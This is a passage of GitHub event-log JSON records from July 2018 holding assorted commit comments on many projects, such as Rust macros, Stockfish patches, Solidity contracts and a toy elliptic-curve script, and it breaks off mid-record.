{"id":"7981450236","type":"CommitCommentEvent","actor":{"login":"cnscott"},"repo":{"name":"cnscott/cs231n.github.io"},"payload":{"comment":{"id":29745923,"position":null,"line":null,"path":null,"commit_id":"1d14710b88579bdc53432d8ee473c3d45e973840","created_at":"2018-07-18T08:35:15Z","updated_at":"2018-07-18T08:35:15Z","author_association":"OWNER","body":"rollback"}},"created_at":"2018-07-18T08:35:15Z"}
{"id":"7981453733","type":"CommitCommentEvent","actor":{"login":"sofianehaddad"},"repo":{"name":"openturns/openturns"},"payload":{"comment":{"id":29745928,"position":null,"line":null,"path":null,"commit_id":"2ce3240636520951a716bb561bd070181e36d72f","created_at":"2018-07-18T08:35:54Z","updated_at":"2018-07-18T08:35:54Z","author_association":"COLLABORATOR","body":"@regislebrun could you also provide the validation document please ?\r\nBtw I think we could do same thing for entered moment, isn't it?"}},"created_at":"2018-07-18T08:35:54Z"}
{"id":"7981459556","type":"CommitCommentEvent","actor":{"login":"coriolinus"},"repo":{"name":"exercism/rust"},"payload":{"comment":{"id":29745935,"position":118,"line":193,"path":"exercises/grep/tests/grep.rs","commit_id":"65431325a505c2bb0315a962f68ba463a3ff3555","created_at":"2018-07-18T08:37:00Z","updated_at":"2018-07-18T08:37:00Z","author_association":"CONTRIBUTOR","body":"bonus points: extract the test name concatenation into its own recursive sub-macro:\r\n\r\n```rust\r\nmacro_rules! set_up_test_case {\r\n    ($(#[$flag:meta])+ $test_case_name:ident(pattern=$pattern:expr, flags=[$($grep_flag:expr),*], files=[$($file:expr),+], expected=[$($expected:expr),*])) => {\r\n        // etc\r\n    };\r\n    ($(#[$flag:meta])+ $test_case_name:ident(pattern=$pattern:expr, flags=[$($grep_flag:expr),*], files=[$($file:expr),+], prefix_expected=[$($expected:expr),*])) => {\r\n        // mostly the same as the other case, but:\r\n        let expected = set_up_test_case!(concat $test_case_name : [$($expected:expr),*]);\r\n    };\r\n    (concat $test_case_name:ident : [$($item:expr),*]) => {\r\n        vec![$(concat!(stringify!($test_case_name),\"_\",$item)),*]\r\n    };\r\n}\r\n```\r\n\r\nOf course, you'd also want to use the concat sub-macro to process the files list in the other expansions."}},"created_at":"2018-07-18T08:37:00Z"}
{"id":"7981467678","type":"CommitCommentEvent","actor":{"login":"Yohei-Haruto-Kobayashi"},"repo":{"name":"Yohei-Haruto-Kobayashi/sandbox"},"payload":{"comment":{"id":29745952,"position":null,"line":null,"path":null,"commit_id":"91baf14c1326a69b22997ad1331e28e473c31173","created_at":"2018-07-18T08:38:36Z","updated_at":"2018-07-18T08:38:36Z","author_association":"OWNER","body":"ggggg"}},"created_at":"2018-07-18T08:38:36Z"}
{"id":"7981471394","type":"CommitCommentEvent","actor":{"login":"Yohei-Haruto-Kobayashi"},"repo":{"name":"Yohei-Haruto-Kobayashi/sandbox"},"payload":{"comment":{"id":29745960,"position":null,"line":null,"path":null,"commit_id":"872d990a048f06602470794e1993da1e645608a4","created_at":"2018-07-18T08:39:19Z","updated_at":"2018-07-18T08:39:19Z","author_association":"OWNER","body":"aaaaaaaaaaaa"}},"created_at":"2018-07-18T08:39:19Z"}
{"id":"7981473069","type":"CommitCommentEvent","actor":{"login":"gharlan"},"repo":{"name":"yakamara/ydeploy"},"payload":{"comment":{"id":29745966,"position":33,"line":33,"path":"deployer/tasks/local/setup.php","commit_id":"785d5afbf5107d7dabe4e6ba2509bc099a90aba4","created_at":"2018-07-18T08:39:39Z","updated_at":"2018-07-18T08:39:39Z","author_association":"MEMBER","body":"Wie groß ist da das Risiko? (Habe da keine Ahnung)"}},"created_at":"2018-07-18T08:39:39Z"}
{"id":"7981474601","type":"CommitCommentEvent","actor":{"login":"yonghyun123"},"repo":{"name":"yonghyun123/javaWeb"},"payload":{"comment":{"id":29745969,"position":null,"line":null,"path":null,"commit_id":"c86eee44c54b83d0f95db6846a8f754c64c3df34","created_at":"2018-07-18T08:39:55Z","updated_at":"2018-07-18T08:39:55Z","author_association":"OWNER","body":"DataSource를 이용하는 Bean을 잘봐야해"}},"created_at":"2018-07-18T08:39:55Z"}
{"id":"7981481451","type":"CommitCommentEvent","actor":{"login":"Yohei-Haruto-Kobayashi"},"repo":{"name":"Yohei-Haruto-Kobayashi/sandbox"},"payload":{"comment":{"id":29745977,"position":null,"line":null,"path":null,"commit_id":"98eb7225acb025a4a600bd3a7a41d7fb821409c7","created_at":"2018-07-18T08:41:14Z","updated_at":"2018-07-18T08:41:14Z","author_association":"OWNER","body":"vttt"}},"created_at":"2018-07-18T08:41:14Z"}
{"id":"7981483335","type":"CommitCommentEvent","actor":{"login":"Gama11"},"repo":{"name":"HaxeCheckstyle/tokentree-formatter"},"payload":{"comment":{"id":29745982,"position":5,"line":14,"path":"src/tokentreeformatter/config/WhitespaceConfig.hx","commit_id":"8938cd145458e02518e5a314e71ef937654f9aa5","created_at":"2018-07-18T08:41:35Z","updated_at":"2018-07-18T08:41:35Z","author_association":"MEMBER","body":"..."}},"created_at":"2018-07-18T08:41:35Z"}
{"id":"7981484980","type":"CommitCommentEvent","actor":{"login":"gharlan"},"repo":{"name":"yakamara/ydeploy"},"payload":{"comment":{"id":29745986,"position":null,"line":null,"path":null,"commit_id":"785d5afbf5107d7dabe4e6ba2509bc099a90aba4","created_at":"2018-07-18T08:41:54Z","updated_at":"2018-07-18T08:41:54Z","author_association":"MEMBER","body":"Die Idee finde ich auf jeden Fall nett. Weiß aber noch nicht, ob ich das in absehbarer Zeit umsetzen werde."}},"created_at":"2018-07-18T08:41:54Z"}
{"id":"7981485939","type":"CommitCommentEvent","actor":{"login":"Yohei-Haruto-Kobayashi"},"repo":{"name":"Yohei-Haruto-Kobayashi/sandbox"},"payload":{"comment":{"id":29745988,"position":null,"line":null,"path":null,"commit_id":"cb39579e396bf865dd312b3cf64cdbf7903d353c","created_at":"2018-07-18T08:42:06Z","updated_at":"2018-07-18T08:42:06Z","author_association":"OWNER","body":"fffff"}},"created_at":"2018-07-18T08:42:06Z"}
{"id":"7981489792","type":"CommitCommentEvent","actor":{"login":"locutus2"},"repo":{"name":"mrobaczyk/Stockfish"},"payload":{"comment":{"id":29745995,"position":null,"line":null,"path":null,"commit_id":"e79ac5a5f3afbd6e918d75a31a32c8c090c76f75","created_at":"2018-07-18T08:42:48Z","updated_at":"2018-07-18T08:42:48Z","author_association":"NONE","body":"@mrobaczyk \r\nThe problem is that your patch adds undefined behavior because you use an index for the TrappedRook array which is out of range. The reason is the function pos.can_castle(Us) don't returns a boolean value but the corresponding castling flags (zero for no castling). So you have to cast first the function result to a boolean value: `bool(pos.can_castle(Us))` to get an index of 0 or 1."}},"created_at":"2018-07-18T08:42:48Z"}
{"id":"7981490985","type":"CommitCommentEvent","actor":{"login":"NightRaven97"},"repo":{"name":"NightRaven97/DailyCodingProblem"},"payload":{"comment":{"id":29746002,"position":null,"line":null,"path":null,"commit_id":"9d79b77d2a3f3512ce5e564bc3f1ccb70ad4f0da","created_at":"2018-07-18T08:43:02Z","updated_at":"2018-07-18T08:43:02Z","author_association":"OWNER","body":"Added #3*"}},"created_at":"2018-07-18T08:43:02Z"}
{"id":"7981492901","type":"CommitCommentEvent","actor":{"login":"DarineAbusaadeh"},"repo":{"name":"DarineAbusaadeh/CCM"},"payload":{"comment":{"id":29746007,"position":null,"line":null,"path":null,"commit_id":"fe3bac2601e2ada8a8a360de6ac30a1e36ddb26b","created_at":"2018-07-18T08:43:24Z","updated_at":"2018-07-18T08:43:24Z","author_association":"OWNER","body":"Darine Abu Sa'adeh\r\nMEAL &IM Manager \r\nMedair\r\nsenior-io-monitoring@medair.org"}},"created_at":"2018-07-18T08:43:24Z"}
{"id":"7981498325","type":"CommitCommentEvent","actor":{"login":"billybichon"},"repo":{"name":"billybichon/liveGQL"},"payload":{"comment":{"id":29746015,"position":null,"line":null,"path":null,"commit_id":"42154b200727e70a7556e3ca89b217407d9b1a70","created_at":"2018-07-18T08:44:25Z","updated_at":"2018-07-18T08:44:25Z","author_association":"OWNER","body":"Hi,\r\n\r\nYou have to first create a LiveGQL object with your domain and a LiveGQLListener overriding the following method `void onMessageReceived(String message, String tag);`\r\n\r\nThen you can call `liveGQL.subscribe(\"your query\", \"tag\");` and every time your query update the *onMessageReceived* method will be call with the response and the corresponding tag.\r\n\r\nIf you want a more friendly way to do this, you can check my other library [rxLiveGQL](https://github.com/billybichon/rxLiveGQL) that use observable to watch your queries."}},"created_at":"2018-07-18T08:44:25Z"}
{"id":"7981499606","type":"CommitCommentEvent","actor":{"login":"DarineAbusaadeh"},"repo":{"name":"DarineAbusaadeh/CCM"},"payload":{"comment":{"id":29746018,"position":null,"line":null,"path":null,"commit_id":"fe3bac2601e2ada8a8a360de6ac30a1e36ddb26b","created_at":"2018-07-18T08:44:40Z","updated_at":"2018-07-18T08:44:40Z","author_association":"OWNER","body":"Finish"}},"created_at":"2018-07-18T08:44:40Z"}
{"id":"7981506612","type":"CommitCommentEvent","actor":{"login":"stellarspot"},"repo":{"name":"opencog/relex"},"payload":{"comment":{"id":29746036,"position":39,"line":39,"path":"src/java/relex/utils/ResourceUtils.java","commit_id":"47c22bf77e8563d5ee4cef5c516e2e676c335068","created_at":"2018-07-18T08:46:00Z","updated_at":"2018-07-18T08:46:00Z","author_association":"CONTRIBUTOR","body":"I updated it."}},"created_at":"2018-07-18T08:46:00Z"}
{"id":"7981510238","type":"CommitCommentEvent","actor":{"login":"stellarspot"},"repo":{"name":"opencog/relex"},"payload":{"comment":{"id":29746046,"position":41,"line":89,"path":"src/java/relex/corpus/DocSplitterOpenNLP15Impl.java","commit_id":"915c5d417ae3df0577608eba1a93924a7a2ea0d6","created_at":"2018-07-18T08:46:41Z","updated_at":"2018-07-18T08:46:41Z","author_association":"CONTRIBUTOR","body":"1. updated.\r\n2. Added the comments to the pull request. "}},"created_at":"2018-07-18T08:46:41Z"}
{"id":"7981511173","type":"CommitCommentEvent","actor":{"login":"PhilippWendler"},"repo":{"name":"sosy-lab/benchexec"},"payload":{"comment":{"id":29746050,"position":null,"line":null,"path":null,"commit_id":"15e1dd35d7223039078b658a4e5ab86427144fe4","created_at":"2018-07-18T08:46:52Z","updated_at":"2018-07-18T08:46:52Z","author_association":"MEMBER","body":"@leostrakosch Do you have an idea why this fails?\r\n\r\nComparing `inf` values with `==` should work, `float(\"-inf\") == -float(\"inf\")` gives the expected result `True`."}},"created_at":"2018-07-18T08:46:52Z"}
{"id":"7981512468","type":"CommitCommentEvent","actor":{"login":"Djuliuss"},"repo":{"name":"Djuliuss/Remittance"},"payload":{"comment":{"id":29746054,"position":41,"line":76,"path":"contracts/Remittance.sol","commit_id":"51d066f79cc71928bc9afeb541c818de0c4bd6db","created_at":"2018-07-18T08:47:05Z","updated_at":"2018-07-18T08:47:05Z","author_association":"OWNER","body":"I tried to implement it but I encountered a blocker.\r\nI had a warning at compiling when I keccak256 the password if I changed it to bytes32 (at the moment is bytes).\r\nNot a problem, I thought, I will just change it in the mapping , like\r\n`mapping(bytes => PaymentStruct) public paymentStructs;`\r\nbut then I had this error : UnimplementedFeatureError: Accessors for mapping with dynamically-sized keys not yet implemented"}},"created_at":"2018-07-18T08:47:05Z"}
{"id":"7981516236","type":"CommitCommentEvent","actor":{"login":"cristealucian97"},"repo":{"name":"cristealucian97/homeautomationbeta"},"payload":{"comment":{"id":29746061,"position":null,"line":null,"path":null,"commit_id":"089a6654c5acb1cd9af44024d8fe4279a10680a3","created_at":"2018-07-18T08:47:50Z","updated_at":"2018-07-18T08:47:50Z","author_association":"OWNER","body":"We need to change all endpoints! Sorry Sebi :("}},"created_at":"2018-07-18T08:47:50Z"}
{"id":"7981516782","type":"CommitCommentEvent","actor":{"login":"ivowillemsen"},"repo":{"name":"ivowillemsen/b9lab-rps"},"payload":{"comment":{"id":29746063,"position":285,"line":246,"path":"contracts/RockPaperScissors.sol","commit_id":"b85afd8baf463cc123fdc46f8ca0e351edcff46c","created_at":"2018-07-18T08:47:57Z","updated_at":"2018-07-18T08:47:57Z","author_association":"OWNER","body":"Basically, the invitee can always cancel the game. The inviter can only cancel the game until the invitee has accepted the game. The deadline mechanism I only applied when accepting the game. What I extract from your comments is that you would also condition the cancel functionality with the deadline. "}},"created_at":"2018-07-18T08:47:57Z"}
{"id":"7981517053","type":"CommitCommentEvent","actor":{"login":"miguel-l"},"repo":{"name":"miguel-l/Stockfish"},"payload":{"comment":{"id":29746064,"position":null,"line":null,"path":null,"commit_id":"6143c852c9e044cba63ef74607609e246d595c2c","created_at":"2018-07-18T08:48:00Z","updated_at":"2018-07-18T08:48:00Z","author_association":"OWNER","body":"Okay, will resubmit."}},"created_at":"2018-07-18T08:48:00Z"}
{"id":"7981517767","type":"CommitCommentEvent","actor":{"login":"Djuliuss"},"repo":{"name":"Djuliuss/Remittance"},"payload":{"comment":{"id":29746067,"position":41,"line":76,"path":"contracts/Remittance.sol","commit_id":"51d066f79cc71928bc9afeb541c818de0c4bd6db","created_at":"2018-07-18T08:48:08Z","updated_at":"2018-07-18T08:48:08Z","author_association":"OWNER","body":"So I can't keccak256 a bytes32 variable and I can't do a mapping with a bytes variable."}},"created_at":"2018-07-18T08:48:08Z"}
{"id":"7981518155","type":"CommitCommentEvent","actor":{"login":"zigza-kimura"},"repo":{"name":"zigza-kimura/test"},"payload":{"comment":{"id":29746068,"position":1,"line":1,"path":"config/enviroment.rb","commit_id":"e33cc84d72285c13ee0d0829873085266e7b1173","created_at":"2018-07-18T08:48:12Z","updated_at":"2018-07-18T08:48:12Z","author_association":"OWNER","body":"コメント"}},"created_at":"2018-07-18T08:48:12Z"}
{"id":"7981519296","type":"CommitCommentEvent","actor":{"login":"mrobaczyk"},"repo":{"name":"mrobaczyk/Stockfish"},"payload":{"comment":{"id":29746073,"position":null,"line":null,"path":null,"commit_id":"e79ac5a5f3afbd6e918d75a31a32c8c090c76f75","created_at":"2018-07-18T08:48:25Z","updated_at":"2018-07-18T08:48:25Z","author_association":"OWNER","body":"Thanks for help. I've overlooked that. Resubmitting the test."}},"created_at":"2018-07-18T08:48:25Z"}
{"id":"7981519633","type":"CommitCommentEvent","actor":{"login":"Morganamilo"},"repo":{"name":"ejmg/an-idiots-guide-to-installing-arch-on-a-lenovo-carbon-x1-gen-6"},"payload":{"comment":{"id":29746076,"position":8,"line":97,"path":"README.org","commit_id":"0286bf48e30c505393b38a5d60eefbccbf75e24d","created_at":"2018-07-18T08:48:28Z","updated_at":"2018-07-18T08:48:28Z","author_association":"NONE","body":"\"who like to discourage making things easily accessible\" You say that, yet arch has an amazing wiki and I was trying to encourage you to contribute to it. The wiki will always be updated and kept up to date, while sources like this will not.\r\n\r\nJust like how yaourt used to be the main AUR helper. Tons of tutorials and articles got written recommending it. Now that yaourt is no longer recommended, all these sources still recommend yaourt and give outdated, incorrect information. The wiki is left as the only accurate source."}},"created_at":"2018-07-18T08:48:28Z"}
{"id":"7981519736","type":"CommitCommentEvent","actor":{"login":"zigza-kimura"},"repo":{"name":"zigza-kimura/test"},"payload":{"comment":{"id":29746078,"position":null,"line":null,"path":null,"commit_id":"e33cc84d72285c13ee0d0829873085266e7b1173","created_at":"2018-07-18T08:48:30Z","updated_at":"2018-07-18T08:48:30Z","author_association":"OWNER","body":"追加"}},"created_at":"2018-07-18T08:48:30Z"}
{"id":"7981521146","type":"CommitCommentEvent","actor":{"login":"szszszsz"},"repo":{"name":"Nitrokey/libnitrokey"},"payload":{"comment":{"id":29746081,"position":14,"line":120,"path":"CMakeLists.txt","commit_id":"6e3ae3175b34679cf1e84fc6dc5b9ebe6a9c0478","created_at":"2018-07-18T08:48:46Z","updated_at":"2018-07-18T08:48:46Z","author_association":"MEMBER","body":"Sure! It was not tested indeed in this case. It will be released in v3.4.1.\r\nTo keep in sync for future: registered as https://github.com/Nitrokey/libnitrokey/issues/126 and fixed."}},"created_at":"2018-07-18T08:48:46Z"}
{"id":"7981522874","type":"CommitCommentEvent","actor":{"login":"zigza-kimura"},"repo":{"name":"zigza-kimura/test"},"payload":{"comment":{"id":29746085,"position":null,"line":null,"path":null,"commit_id":"e33cc84d72285c13ee0d0829873085266e7b1173","created_at":"2018-07-18T08:49:07Z","updated_at":"2018-07-18T08:49:07Z","author_association":"OWNER","body":"機能追加① #1"}},"created_at":"2018-07-18T08:49:07Z"}
{"id":"7981523228","type":"CommitCommentEvent","actor":{"login":"EvilJackCarver"},"repo":{"name":"Chatter42/AEIOUStation13"},"payload":{"comment":{"id":29746086,"position":null,"line":null,"path":null,"commit_id":"3de429d8578b0e48e5917e7b1180b6d23df62819","created_at":"2018-07-18T08:49:10Z","updated_at":"2018-07-18T08:49:10Z","author_association":"CONTRIBUTOR","body":":("}},"created_at":"2018-07-18T08:49:10Z"}
{"id":"7981523743","type":"CommitCommentEvent","actor":{"login":"dzharkov"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":29746088,"position":11,"line":11,"path":"compiler/testData/codegen/java8/box/reflection/parameters/realParameterNames.kt","commit_id":"1ad99c75fb556915a3755700bbee302c3ca8ebcf","created_at":"2018-07-18T08:49:16Z","updated_at":"2018-07-18T08:49:16Z","author_association":"MEMBER","body":"I'd made it public just for the sake of symmetry :)"}},"created_at":"2018-07-18T08:49:16Z"}
{"id":"7981535690","type":"CommitCommentEvent","actor":{"login":"drenkas"},"repo":{"name":"drenkas/React-Redux-TODO"},"payload":{"comment":{"id":29746105,"position":12,"line":79,"path":"src/containers/VisiblePostList.js","commit_id":"23240fe00bfec9bf59e0811f67cc4aa7e0b8ee17","created_at":"2018-07-18T08:51:30Z","updated_at":"2018-07-18T08:51:30Z","author_association":"OWNER","body":"Бо state.todos у нас імутабельна Map і там нема posts. А щоб отримати все що в нас в todos ми маємо спочатку перевести його в  js об'єкт\r\n"}},"created_at":"2018-07-18T08:51:30Z"}
{"id":"7981536938","type":"CommitCommentEvent","actor":{"login":"coffeemocha"},"repo":{"name":"coffeemocha/ISF"},"payload":{"comment":{"id":29746108,"position":null,"line":null,"path":null,"commit_id":"d3a72a2e470584fa1086189cd550691142ce7727","created_at":"2018-07-18T08:51:43Z","updated_at":"2018-07-18T08:51:43Z","author_association":"OWNER","body":"from ast import literal_eval\r\ndef add_points(x1,y1,x2,y2):\r\n    if x1==0 and y1==0:\r\n        return x2,y2\r\n    elif x1==x2 and y1==y2:\r\n        return double_points(x1,y1,x2,y2)\r\n    u=(x1-x2)%p\r\n    u=modinv(u,p)\r\n    if u==0:\r\n        print('Point at infinity reached')\r\n        return 0,0\r\n    else:\r\n        m=((y1-y2)*(u))%p\r\n        x3=(m**2-x1-x2)%p\r\n        y3=((m*(x1-x3))-y1)%p\r\n        if i==len(binary)-1:\r\n            print('X3= {}'.format(x3))\r\n            print('Y3= {}'.format(y3))\r\n        x1=x3\r\n        y1=y3\r\n    return x1,y1\r\ndef double_points(x1,y1,x2,y2):\r\n        u=2*y1\r\n        u=modinv(u,p)\r\n        m=((3*(x1**2)+A)%p)*(u)\r\n        x3=(m**2-x1-x2)%p\r\n        y3=((m*(x1-x3))-y1)%p\r\n        if i==len(binary)-1:\r\n            print('X3= {}'.format(x3))\r\n            print('Y3= {}'.format(y3))\r\n        x1=x3\r\n        y1=y3\r\n        return x1,y1\r\n    \r\ndef egcd(a, b):\r\n    if a == 0:\r\n        return (b, 0, 1)\r\n    else:\r\n        g, y, x = egcd(b % a, a)\r\n        return (g, x - (b // a) * y, y)\r\n\r\ndef modinv(a, m):\r\n    g, x, y = egcd(a, m)\r\n    if g != 1:\r\n        o=a%m\r\n    else:\r\n        o=x%m\r\n    return o\r\n\r\ndef convert_to_binary(n):\r\n    if n > 1:\r\n        convert_to_binary(n//2)\r\n    global binary\r\n    binary=binary+str((n%2))\r\n\r\ndef checkprime(p):\r\n    if p==2:\r\n            y=False\r\n            return (y)\r\n    elif p==3:\r\n            y=True\r\n            return(y)\r\n    else:\r\n        for i in range(2,p):\r\n            x=p%i\r\n            if x==0:\r\n                   y=False\r\n                   return(y)\r\n                   break\r\n            else:\r\n                if i==p-1:\r\n                   y=True\r\n                   return(y)            \r\n    \r\ndef inputs(x):\r\n    global p\r\n    while x==0:\r\n        oldp=input('Please enter the prime number')\r\n        if type(literal_eval(oldp))!=float and type(literal_eval(oldp))!=int:\r\n            print('Please enter a valid number')\r\n        else:\r\n            p=float((oldp))\r\n            p=int(p)\r\n            if p>1  and checkprime(p)==True:\r\n                x=1\r\n            else:\r\n                print('Please enter a valid number 2')\r\n\r\ndef checkpoint(p):\r\n    global A\r\n    global x1\r\n    global y1\r\n    A=int(input('In the form y^2=x^3+Ax+B, please enter A'))\r\n    B=int(input('In the form y^2=x^3+Ax+B, please enter B'))\r\n    while True:\r\n        x1=int(input('Please enter the x-coordinate of base point'))\r\n        y1=int(input('Please enter the y-coordinate of base point'))\r\n        if (y1**2)%p==(x1**3+A*x1+B)%p and ((4*A)**3+(27*B)**2)%p !=0:\r\n            return\r\n        else:\r\n            print('Invalid point;not on specified curve, please reenter coordinates')\r\n            \r\n\r\ninputs(0)\r\ncheckpoint(p)\r\nwhile True:\r\n    n=input('Please enter your private key')\r\n    if type(literal_eval(n))==int and literal_eval(n)>0:\r\n        n=int(n)\r\n        break\r\n    else:\r\n        print('Please enter an integer')\r\n        \r\nx2=x1\r\ny2=y1\r\nbinary=''\r\nconvert_to_binary(n)\r\nfor i in range(1,len(binary)):\r\n        x1,y1=double_points(x1,y1,x1,y1)\r\n        if int(binary[i])==1:\r\n           x1,y1= add_points(x1,y1,x2,y2)\r\n\r\n\r\n\r\n"}},"created_at":"2018-07-18T08:51:43Z"}
{"id":"7981538228","type":"CommitCommentEvent","actor":{"login":"roytam1"},"repo":{"name":"classilla/tenfourfox"},"payload":{"comment":{"id":29746109,"position":null,"line":null,"path":null,"commit_id":"b6afdab5d473e5508f9af8cf28da92b0691160a6","created_at":"2018-07-18T08:51:57Z","updated_at":"2018-07-18T08:51:57Z","author_association":"NONE","body":"from NSS 3.30 release notes:\r\n```\r\nNew in NSS 3.30\r\nNew Functionality\r\n\r\n    In the PKCS#11 root CA module (nssckbi), CAs with positive trust are marked with a new boolean attribute, CKA_NSS_MOZILLA_CA_POLICY, set to true. Applications that need to distinguish them from other other root CAs, may use the exported function PK11_HasAttributeSet.\r\n```\r\nso we can just treat them as normal CAs?"}},"created_at":"2018-07-18T08:51:57Z"}
{"id":"7981538710","type":"CommitCommentEvent","actor":{"login":"locutus2"},"repo":{"name":"miguel-l/Stockfish"},"payload":{"comment":{"id":29746111,"position":null,"line":null,"path":null,"commit_id":"d785c5aeb451b3c178e39b51c206901ecd97c865","created_at":"2018-07-18T08:52:02Z","updated_at":"2018-07-18T08:52:02Z","author_association":"NONE","body":"Your other versions which the tweaked parameters would simplifications too."}},"created_at":"2018-07-18T08:52:02Z"}
{"id":"7981539207","type":"CommitCommentEvent","actor":{"login":"dukegh"},"repo":{"name":"dukegh/kyivstar"},"payload":{"comment":{"id":29746112,"position":null,"line":null,"path":null,"commit_id":"1c7747ba2dd742a72c41aa95527685ace5b75de3","created_at":"2018-07-18T08:52:07Z","updated_at":"2018-07-18T08:52:07Z","author_association":"OWNER","body":"Не думаю что они специально задумали такую сложную логику авторизации.\r\nСкорее всего это произошло из-за миграции с одного механизма авторизации на\r\nдругой, при этом данные должны были обрабатываться обоими )\r\nНа старом интерфейсе Мой Киевстар у меня был простой парсер на шеле с\r\nавторизацией в  \"один запрос\", было обидно когда он перестал работать.\r\nПришлось повозиться, чтобы сделать новый.\r\n\r\n\r\nср, 18 июл. 2018 г. в 0:18, Victor Gavro <notifications@github.com>:\r\n\r\n> смотрю на логику авторизации и охереваю зачем они так все сложно сделали.\r\n> наверное тебе сильно это было надо)))\r\n>\r\n> —\r\n> You are receiving this because you are subscribed to this thread.\r\n> Reply to this email directly, view it on GitHub\r\n> <https://github.com/dukegh/kyivstar/commit/1c7747ba2dd742a72c41aa95527685ace5b75de3#commitcomment-29740967>,\r\n> or mute the thread\r\n> <https://github.com/notifications/unsubscribe-auth/ANrj0lcGDHglv0GBj9ITmj8PtfHeQ6HUks5uHlSngaJpZM4VTlUS>\r\n> .\r\n>\r\n"}},"created_at":"2018-07-18T08:52:07Z"}
{"id":"7981541442","type":"CommitCommentEvent","actor":{"login":"coffeemocha"},"repo":{"name":"coffeemocha/ISF"},"payload":{"comment":{"id":29746114,"position":null,"line":null,"path":null,"commit_id":"d3a72a2e470584fa1086189cd550691142ce7727","created_at":"2018-07-18T08:52:32Z","updated_at":"2018-07-18T08:52:32Z","author_association":"OWNER","body":"#p=int(input('Enter your prime number'))\r\n#A=int(input('In the form y^2=x^3+Ax+B, enter A'))\r\n#x1=int(input('Enter x-coordinate of first point'))\r\n#y1=int(input('Enter y-coordinate of first point'))\r\n#x2=int(input('Enter x-coordinate of second point'))\r\n#y2=int(input('Enter y-coordinate of second point'))\r\np=0xfffffffffffffffffffffffffffffffffffffffffffffffffffffffefffffc2f\r\nA=0\r\nb=7\r\nx1=0x79be667ef9dcbbac55a06295ce870b07029bfcdb2dce28d959f2815b16f81798\r\ny1=0x483ada7726a3c4655da4fbfc0e1108a8fd17b448a68554199c47d08ffb10d4b8\r\nx2=x1\r\ny2=y1\r\nn=int(input('Enter your private key'))\r\noriginal_x1=x1\r\noriginal_y1=y1\r\nbinary=''\r\ndef add_points(x1,y1,x2,y2):\r\n    if x1==0 and y1==0:\r\n        return original_x1,original_y1\r\n    elif x1==x2 and y1==y2:\r\n        return double_points(x1,y1,x2,y2)\r\n    u=(x1-x2)%p\r\n    u=modinv(u,p)\r\n    if u==0:\r\n        print('Point at infinity reached')\r\n        return 0,0\r\n    else:\r\n        m=((y1-y2)*(u))%p\r\n            \r\n    x3=(m**2-x1-x2)%p\r\n    y3=((m*(x1-x3))-y1)%p\r\n    print('X3= {}'.format(x3))\r\n    print('Y3= {}'.format(y3))\r\n    x1=x3\r\n    y1=y3\r\n    return x1,y1\r\ndef double_points(x1,y1,x2,y2):\r\n    u=2*y1\r\n    u=modinv(u,p)\r\n    m=((3*(x1**2)+A)%p)*(u)\r\n    x3=(m**2-x1-x2)%p\r\n    y3=((m*(x1-x3))-y1)%p\r\n    print('X3= {}'.format(x3))\r\n    print('Y3= {}'.format(y3))\r\n    x1=x3\r\n    y1=y3\r\n    return x1,y1\r\n    \r\ndef egcd(a, b):\r\n    if a == 0:\r\n        return (b, 0, 1)\r\n    else:\r\n        g, y, x = egcd(b % a, a)\r\n        return (g, x - (b // a) * y, y)\r\n\r\ndef modinv(a, m):\r\n    g, x, y = egcd(a, m)\r\n    if g != 1:\r\n        o=a%m\r\n    else:\r\n        o=x%m\r\n    return o\r\n\r\ndef convert_to_binary(n):\r\n    if n > 1:\r\n        convert_to_binary(n//2)\r\n    global binary\r\n    binary=binary+str((n%2))\r\n\r\nconvert_to_binary(n)\r\nfor i in range(1,len(binary)):\r\n        x1,y1=double_points(x1,y1,x1,y1)\r\n        if int(binary[i])==1:\r\n           x1,y1= add_points(x1,y1,x2,y2)\r\n    \r\n\r\n"}},"created_at":"2018-07-18T08:52:32Z"}
{"id":"7981545989","type":"CommitCommentEvent","actor":{"login":"xhochy"},"repo":{"name":"apache/arrow"},"payload":{"comment":{"id":29746119,"position":60,"line":467,"path":"python/pyarrow/scalar.pxi","commit_id":"dc80a768c0a15e62998ccd32d8353d2035302cb6","created_at":"2018-07-18T08:53:22Z","updated_at":"2018-07-18T08:53:22Z","author_association":"MEMBER","body":"@pitrou @kszucs This lead to a 20% increase in `__getitem__` performance: https://pandas.pydata.org/speed/arrow/#array_ops.ScalarAccess.time_getitem\r\n\r\nI fail to generate Cython's nice HTML Annotations in Arrow. That could give us some insight."}},"created_at":"2018-07-18T08:53:22Z"}
{"id":"7981551155","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"inbo/LSVI"},"payload":{"comment":{"id":29746128,"position":null,"line":null,"path":null,"commit_id":"216a301545449db5fd15a7298402fba63dc1b5b5","created_at":"2018-07-18T08:54:19Z","updated_at":"2018-07-18T08:54:19Z","author_association":"NONE","body":"[R/berekenLSVIbasis.R:264:1:](https://github.com/inbo/LSVI/blob/216a301545449db5fd15a7298402fba63dc1b5b5/R/berekenLSVIbasis.R#L264) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>        .data$Habitattype,   #en hier zouden extra gegevens uit Data_habitat moeten toegevoegd worden\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/combinerenVoorwaarden.R:31:1:](https://github.com/inbo/LSVI/blob/216a301545449db5fd15a7298402fba63dc1b5b5/R/combinerenVoorwaarden.R#L31) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>    #nog testen of Formule bestaat uit EN, OF, haakjes en VoorwaardeID's (en evt. andere tekens die logische berekening toelaten)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/deselecteerKenmerkenInOpname.R:45:1:](https://github.com/inbo/LSVI/blob/216a301545449db5fd15a7298402fba63dc1b5b5/R/deselecteerKenmerkenInOpname.R#L45) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>      #Hier moet nog toegevoegd worden dat ofwel de soorten, ofwel de subsoorten gewist moeten worden al naargelang de soorten zelf in de kenmerkenlijst staan (zie berekenAantalSoorten en 